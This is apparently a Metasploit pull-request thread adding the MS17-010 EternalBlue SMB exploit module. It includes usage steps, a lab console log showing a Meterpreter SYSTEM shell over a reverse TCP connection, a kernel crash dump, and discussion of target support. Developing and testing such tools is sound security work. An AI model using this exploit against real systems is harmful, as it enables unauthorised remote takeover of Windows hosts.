exploit/windows/smb/ms17_010_eternalblue

[ghost]

Adds MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module, part of the Equation Group FuzzBunch leaks by Shadow Brokers, reversed/ported by myself and @jennamagius

There is more discussions at #8269

There are a few things that still need to be cleaned up:

1. We have to separate some of the code out from auxiliary/scanner/smb/smb_ms17_010 into a MS17-010 mixin, and use it as the check() for this module. A DoublePulsar module, and others, can also re-use this code.
2. The kernel payload will be multi-arch (x86 and x64). We can't detect arch from SMB banner, so this is for safety. Where should the metasm file go?
3. Is there any support for userland multi-arch payloads?
4. The plugin sleeps while a connection stages. We don't need to sleep, we can go back to grooming the pool again. Is there a way to see if a handler has a pending connection?

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/smb/ms17_010_eternalblue
• set RHOST to Windows 7/2008 x64
• set PAYLOAD
• exploit
• Verify that you get a shell
• Verify that you do not crash (post a core dump if you do)
• Document the thing and how it works

[wvu]

Right out of the box. Beautiful.

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Connecting to target for exploitation.
[+] 192.168.33.129:445 - Connection established for exploitation.
[*] 192.168.33.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.33.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.33.129:445 - Sending NT Trans Request packet
[*] 192.168.33.129:445 - Receiving NT Trans packet
[*] 192.168.33.129:445 - Making :eb_trans2_zero packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Sending malformed Trans2 packets
[*] 192.168.33.129:445 - Starting non-paged pool grooming
[*] 192.168.33.129:445 - Sending start free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Sending SMBv2 buffers
[*] 192.168.33.129:445 - Sending end free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.33.129:445 - Sending final SMBv2 buffers.
[*] 192.168.33.129:445 - Sending last fragment of exploit packet!
[*] 192.168.33.129:445 - Making :eb_trans2_exploit packet
[*] 192.168.33.129:445 - Receiving response from exploit packet
[+] 192.168.33.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.33.129:445 - Sending egg to corrupted connection.
[*] 192.168.33.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49159) at 2017-05-14 20:03:33 -0500
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KAUD1INC0IJ
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

Now for the cleanup!

[wvu]

Hopefully when this binary blob gets split apart, the process hash here can be configurable.

[ghost]

That is the plan yes! It will also need to use the offsets in the Target options.

[ghost]

Added docs, they aren't representative of the current state, but where we want to be. And the language is not harmful for current use.

[wvu]

Sticking the delayed tag on here so it doesn't get merged prematurely. Code is already out there, so people can use it as much as they like.

Exploit-DB and Packet Storm: please don't archive this just yet. :-)

[wvu]

Don't have a good answer for this yet, since what you've done is pretty much SOP. However, you shouldn't need to run handler explicitly, since it should already be started. Also, you can use session_created? instead of session_count below.

[ghost]

Fixed in cb4c700

[ghost]

I pushed new shellcode, specifically it does the dynamic search for ETHREAD.ThreadListEntry instead of the fixed offset. Some people passed me some crash dumps and I think this is needed to for the multiple service pack support. Please retest.

I also added a better sleep mechanism for the session created thing. Now if a session is created and staged immediately, you don't have to wait the full 5 seconds.

[wvu]

Still working here as of the latest commit.

[ghost]

Same for me. It now should support Windows 7, at least I'm being told people are now popping shells who were crashing before. The offsets for 2008 were apparently different.

[wvu]

@bcoles tested Win7 SP1 successfully. Currently spinning up my setup.

[bcoles]

Tested first commit on Windows 7 SP1 x64 successfully. Worked first time.
Tested first commit on Windows XP SP3 x86. Failed. BSOD.

Tested latest commit on Windows 7 SP1 x64 successfully. Worked first time.
Tested latest commit on Windows XP SP3 x86. Failed. BSOD.

[ghost]

Yea XP support is not in yet, nor is x86 (the two will go hand in hand). So it doesn't surprise me it fails. The main overflow packet will be sent, but the SMB2 packets (payload) won't be processed as SMB2 is Vista+. The original exploit does the payload grooms with SMB1 packets for XP but I haven't yet gotten to it. As such, XP is not yet in the Targets.

We can eventually do SMB header fingerprinting so that people won't BSOD because of wrong Target. Also, while we can't detect the CPU arch from SMB headers, we can silently fail. Ideally I'd like to just have a multi-arch userland payload, but I don't think that's supported yet.

[bcoles]

Unsurprisingly, didn't work on Windows Server 2003 R2. However, it didn't BSOD either, so that's something.

[ghost]

It not crashing on 2k3 R2 is actually more worrisome. No crash no exploit! Weird since 2003 and 2003 R2 are both NT 5.2. XP is 5.1.

Do the EQGRP tools infect 2003 and 2003 R2 with DoPu?

[bcoles]

Windows Server 2003 R2 does in fact blue screen. But not always.

[byt3bl33d3r]

@zerosum0x0 you can't detect the OS arch via SMB headers but you can detect it using an RPC connection (no auth required):
https://msdn.microsoft.com/en-us/library/cc243948.aspx#Appendix_A_53

Here's an example implementation using Impacket:
/~https://github.com/CoreSecurity/impacket/blob/master/examples/getArch.py

Don't know if this is useful or not, just thought I'd leave this here in case you haven't come across it.

Cheers & awesome work!

[kaospunk]

Tested against:
Windows 7 SP0 x64 - Working
Windows 7 SP1 x64 - Working
Windows 2008 R2 SP1 - Working

[ghost]

@byt3bl33d3r nice catch, we can print a warning if the payload doesn't match. Maybe VerifyVersion and VerifyArch bool options (advanced?), so you don't shoot a 2008 x64 at XP x86. Eventually remove VerifyArch if userland payloads become multi-arch

I'm also going to add the print statement FuzzBunch has that spills the banner version.

[tsellers-r7]

Is this value expected to change or is it required to be exactly this in order for the EB exploit to work?

[ghost]

This value can be changed without BSOD. But if you change it no shells will be popped.

[ghost]

Changed it to GoodRanking per @egypt

[wchen-r7]

Hi, I am using a x86 Windows 7 SP1 and it never works for me. I don't have a lot of information right now, but here's some from WinDBG, I hope it helps:

kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KMODE_EXCEPTION_NOT_HANDLED (1e)
This is a very common bugcheck.  Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Arguments:
Arg1: c000001d, The exception code that was not handled
Arg2: 82b3da60, The address that the exception occurred at
Arg3: 00000000, Parameter 0 of the exception
Arg4: 00000000, Parameter 1 of the exception

Debugging Details:
------------------


DUMP_CLASS: 1

DUMP_QUALIFIER: 0

BUILD_VERSION_STRING:  6.1.7601.17514 (win7sp1_rtm.101119-1850)

DUMP_TYPE:  0

BUGCHECK_P1: ffffffffc000001d

BUGCHECK_P2: ffffffff82b3da60

BUGCHECK_P3: 0

BUGCHECK_P4: 0

EXCEPTION_CODE: (NTSTATUS) 0xc000001d - {EXCEPTION}  Illegal Instruction  An attempt was made to execute an illegal instruction.

FAULTING_IP: 
nt!KiDoubleFaultStack+1a60
82b3da60 04e1            add     al,0E1h

EXCEPTION_PARAMETER1:  865928e8

BUGCHECK_STR:  0x1E_c000001d

CPU_COUNT: 1

CPU_MHZ: a85

CPU_VENDOR:  GenuineIntel

CPU_FAMILY: 6

CPU_MODEL: 3a

CPU_STEPPING: 9

CPU_MICROCODE: 6,3a,9,0 (F,M,S,R)  SIG: 15'00000000 (cache) 15'00000000 (init)

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

PROCESS_NAME:  System

CURRENT_IRQL:  2

ANALYSIS_SESSION_HOST:  DESKTOP-E1EQOJA

ANALYSIS_SESSION_TIME:  05-16-2017 09:33:51.0354

ANALYSIS_VERSION: 10.0.15063.137 amd64fre

LAST_CONTROL_TRANSFER:  from 94324290 to ffdff1fe

FAILED_INSTRUCTION_ADDRESS: 
nt!KiDoubleFaultStack+1a60
82b3da60 04e1            add     al,0E1h

CONTEXT:  82b3db60 -- (.cxr 0xffffffff82b3db60)
eax=ffffffff ebx=ffd00ff8 ecx=c0000082 edx=00000000 esi=ffdff020 edi=ffdff0c0
eip=ffdff1fe esp=82b3e1cc ebp=82b3e218 iopl=0         nv up ei ng nz ac pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010296
ffdff1fe ff              ???
Resetting default scope

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
82b3e1c8 94324290 00000000 00000000 00000420 0xffdff1fe
82b3e218 94322204 ffdff020 00001069 00001069 srvnet!SrvNetCommonReceiveHandler+0x94
82b3e258 943235db ffdff020 00000001 85c5e85b srvnet!SrvNetIndicateData+0x73
82b3e274 82a8e933 00000000 02000000 01b7c010 srvnet!SrvNetWskReceiveComplete+0x72
82b3e2b8 899a1b84 867a0380 82b3e33c 896728b2 nt!IopfCompleteRequest+0x128
82b3e2c4 896728b2 85c5e7e8 00000000 00001069 afd!WskProTLReceiveComplete+0x5e
82b3e33c 8965e417 867a0380 00000000 868d0df8 tcpip!TcpCompleteClientReceiveRequest+0x1c
82b3e3a8 8965e49c 868d0df8 868d0ef0 00000000 tcpip!TcpFlushTcbDelivery+0x1f6
82b3e3c4 8966ba97 868d0df8 00000000 82b3e4b8 tcpip!TcpFlushRequestReceive+0x1c
82b3e400 8966b95f 868d0df8 868d0df8 82b3e490 tcpip!TcpDeliverFinToClient+0x37
82b3e410 896bc691 868d0df8 82b3e570 868d0df8 tcpip!TcpAllowFin+0x86
82b3e490 896bac9e 85e45f20 868d0df8 82b3e4b8 tcpip!TcpTcbCarefulDatagram+0x16c9
82b3e4fc 8969e2d8 85e45f20 868d0df8 00b3e570 tcpip!TcpTcbReceive+0x228
82b3e564 8969eada 85268008 858a79cc 858a7ab0 tcpip!TcpMatchReceive+0x237
82b3e5b4 8969eb4b 85e45f20 858a7000 000052c8 tcpip!TcpPreValidatedReceive+0x263
82b3e5d0 89698e77 85e45f20 858a7000 82b3e60c tcpip!TcpReceive+0x2d
82b3e5e0 896a10ab 82b3e5f4 c000023e 00000000 tcpip!TcpNlClientReceiveDatagrams+0x12
82b3e60c 896a09f6 89718f90 82b3e660 c000023e tcpip!IppDeliverListToProtocol+0x49
82b3e62c 8969edb8 89718da0 00000006 82b3e660 tcpip!IppProcessDeliverList+0x2a
82b3e684 896a089f 89718da0 00000006 00000000 tcpip!IppReceiveHeaderBatch+0x1fb
82b3e718 896aeccc 85ac0660 00000000 00000801 tcpip!IpFlcReceivePackets+0xbe5
82b3e794 896a92fe 85acd730 8610daa0 00000000 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x746
82b3e7c8 82a9f654 8610daa0 8c465651 85356e28 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0x11e
82b3e830 896a946c 896a91e0 82b3e858 00000000 nt!KeExpandKernelStackAndCalloutEx+0x132
82b3e86c 8955118d 85acd702 8610da00 00000000 tcpip!FlReceiveNetBufferListChain+0x7c
82b3e8a4 8953f5be 85acf008 8610daa0 00000000 ndis!ndisMIndicateNetBufferListsToOpen+0x188
82b3e8cc 8953f4b2 00000000 8610daa0 85b500e0 ndis!ndisIndicateSortedNetBufferLists+0x4a
82b3ea48 894eac1d 85b500e0 00000000 00000000 ndis!ndisMDispatchReceiveNetBufferLists+0x129
82b3ea64 8953f553 85b500e0 8610daa0 00000000 ndis!ndisMTopReceiveNetBufferLists+0x2d
82b3ea8c 894eac78 85b500e0 8610daa0 00000000 ndis!ndisMIndicateReceiveNetBufferListsInternal+0x62
82b3eab4 8ebab7f4 85b500e0 8610daa0 00000000 ndis!NdisMIndicateReceiveNetBufferLists+0x52
82b3eafc 8ebaa77e 00000000 860dd080 00000003 E1G60I32!RxProcessReceiveInterrupts+0x108
82b3eb14 8953f89a 01bdf008 00000000 82b3eb40 E1G60I32!E1000HandleInterrupt+0x80
82b3eb50 894eaa0f 860dd094 000dd080 00000000 ndis!ndisMiniportDpc+0xe2
82b3eb78 82a8e1b5 860dd094 860dd080 00000000 ndis!ndisInterruptDpc+0xaf
82b3ebd4 82a8e018 82b41d20 82b4b380 00000000 nt!KiExecuteAllDpcs+0xf9
82b3ec20 82a8de38 00000000 0000000e 00000000 nt!KiRetireDpcList+0xd5
82b3ec24 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x38


THREAD_SHA1_HASH_MOD_FUNC:  287b694a64a49619882835dddf7c7b4aaa6e3813

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  71346b085c84d98a9e2fdefddef38f775898a1fd

THREAD_SHA1_HASH_MOD:  14d3c2b2d3bd40d0699c1b7b5aa6b84b040f77ef

FOLLOWUP_IP: 
srvnet!SrvNetCommonReceiveHandler+94
94324290 8bf8            mov     edi,eax

FAULT_INSTR_CODE:  a1f88b

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  srvnet!SrvNetCommonReceiveHandler+94

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: srvnet

IMAGE_NAME:  srvnet.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  4ce78a6b

STACK_COMMAND:  .cxr 0xffffffff82b3db60 ; kb

FAILURE_BUCKET_ID:  0x1E_c000001d_BAD_IP_srvnet!SrvNetCommonReceiveHandler+94

BUCKET_ID:  0x1E_c000001d_BAD_IP_srvnet!SrvNetCommonReceiveHandler+94

PRIMARY_PROBLEM_CLASS:  0x1E_c000001d_BAD_IP_srvnet!SrvNetCommonReceiveHandler+94

TARGET_TIME:  2017-05-16T16:32:40.000Z

OSBUILD:  7601

OSSERVICEPACK:  17514

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

SUITE_MASK:  272

PRODUCT_TYPE:  1

OSPLATFORM_TYPE:  x86

OSNAME:  Windows 7

OSEDITION:  Windows 7 WinNt TerminalServer SingleUserTS

OS_LOCALE:  

USER_LCID:  0

OSBUILD_TIMESTAMP:  2010-11-20 00:42:49

BUILDDATESTAMP_STR:  101119-1850

BUILDLAB_STR:  win7sp1_rtm

BUILDOSVER_STR:  6.1.7601.17514

ANALYSIS_SESSION_ELAPSED_TIME:  4a95

ANALYSIS_SOURCE:  KM

FAILURE_ID_HASH_STRING:  km:0x1e_c000001d_bad_ip_srvnet!srvnetcommonreceivehandler+94

FAILURE_ID_HASH:  {cdce54a8-eca5-e745-2f0e-2cc8ba9c3178}

Followup:     MachineOwner

[phillips321]

Don't think x86 is supported yet, needs to be x64 i believe...

[wvu]

Yeah, x86 isn't supported yet. Merging now. See y'all in the next PR.

[wvu]

e24de5f, 6d81ca4

[nanotechz9l]

Reading sinners x86 comment made me dig into the dox. On the dox page it indicates that the exploit module works on win 7 x86 all service packs. Typo or maybe it means the leaked exploits supports it but the module does not at this time. a one liner to clarify that if thats indeed the case would avoid confusion. Thx!

/~https://github.com/rapid7/metasploit-framework/pull/8381/files#diff-46a35d8ed2a7941fdf466b0794048f86

[wvu]

Yeah, @wchen-r7 noticed that as well. We didn't notice until after the early merge. The reasoning was explained above: #8381 (comment). It makes less sense now that we've already merged the PR, so we should probably make note of that in the doc.

[wvu]

Fixed in 21e741b.

[nanotechz9l]

Cool thx

[lance0]

@wvu-r7 is the sploit supposed to be x64 only?

[wvu]

@lance0: We literally answered that in this thread, even yesterday. x86 support is not finished yet.

[busterb]

Also, arm is not supported, nor mips, alpha, or powerpc (all theoretical if you go back far enough in Windows history I guess :P) - happy to accept PRs though.

[lance0]

@wvu-r7 sorry I saw it after I posted, too big of a lunch made brain go to a crawl.

[wvu]

Lol, no problem. Cheers!

[OJ]

For those that haven't seen it yet: https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e

[ghost]

There is a new PR @ #8399

[OJ]

Ah missed that, thanks @zerosum0x0 !

[alrosenthal-r7]

Release Notes

The exploits/windows/smb/ms17_010_eternalblue module has been added to the framework. The exploit was originally written by the Equation Group (NSA). It allows you to gain access as SYSTEM, the highest Windows user mode privilege, and obtain full control of the kernel in ring 0. The exploit currently only works on Windows 7 (x64) and Windows 2008 R2 (x64).

[bwatters-r7]

@alrosenthal-r7 please double check the supported targets. I think this module only supports Windows 7x64 and windows 2K8r2 (x64). The underlying exploit in wannacry works on a lot more, but unless I'm mistaken, this module only works with 64-bit versions of windows kernel 6.1.* (I guess it might work on windows home server 2011 for all that would matter...?).
Sorry to edit this and spam people, but I'm going to give a shoutout to @tdoan-r7 so she sees this.

[tdoan-r7]

@bwatters-r7 thanks for the catch!

[wvu]

I dropped the ball on this one. So much for catching up with all my release notes. Terribly sorry.

[FicusPower]

It can be performed on WAN ?

[wvu]

I'm locking this thread. Not a support forum, folks. Ask on IRC or the Rapid7 Community site. File a ticket if it's a bug. Don't file a duplicate.